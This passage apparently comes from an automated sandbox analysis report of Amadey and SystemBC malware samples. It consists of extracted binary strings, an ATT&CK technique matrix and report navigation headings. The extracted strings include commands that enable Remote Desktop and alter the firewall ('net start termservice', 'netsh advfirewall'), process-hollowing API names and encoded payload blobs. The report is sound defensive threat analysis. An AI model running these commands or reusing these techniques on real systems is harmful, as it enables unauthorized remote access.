ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe, 0000000E.00000002.3763187242.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 0000000E.00000002.3763187242.0000000000461000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Fp80Ocyhqm.exe	String found in binary or memory: net start termservice
Source: Fp80Ocyhqm.exe	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall
Source: Gxtuum.exe.0.dr	String found in binary or memory: net start termservice
Source: Gxtuum.exe.0.dr	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 VX0JKuOPWGBWUZGDK4B=JQqTYFZNZJCt3qWB6ZyMW1VpMFA ZZMt3bqj2YRcSrux2ZSH5UOp9KKYXHUm4DMqKbqk2XcJTF==MsFwPEE=Gv0m1YZsfKCj5KWs6jesIpmLZZIsgEMV0LduGv0m1YZsfKCj5KWs6jesIpqLZZIsgEMV0LduJPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SRgWmVcS8Kw4p0x8C0e rSib4Z=JwOv2IZjfJUf3ZZ=B9FxRR==B9FyPh==B9FxQh==B9FyQR==FS0yfnZufJyZ2ZCnMp==D9t62c0u2HBsOExsQ0moARxgxcWhf3xrc1mqzFdpCz i9WFbx8FmMjF0c1Qj3603CAF Gm3 ZIQpNx==y83gUYlpfHx=x8FmMjFy11Texr3mLB==Jvd32YNzcLKq3F o9DV=AL042XR1fLat3qGy6DmcbWGrZYWsiDMu0Liu2XUgNZOn3JZjCd==x6==2Rm1gHVvf7TeC0RjFUR JE==2SV9fx==2bKu2HctHR051ncherFeKJK860WTUJGrZYss3TH=BsFwPEE0OY =BsFwPEE0Oox=BsFwPEE0OoB=BsFwPEE0O7N=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	2 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	112 Process Injection	4 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Screen Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	12 Software Packing	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	236 System Information Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	761 Security Software Discovery	SSH	Keylogging	113 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	251 Virtualization/Sandbox Evasion	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	112 Process Injection	DCSync	251 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Fp80Ocyhqm.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Threatname: SystemBC

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Fp80Ocyhqm.exe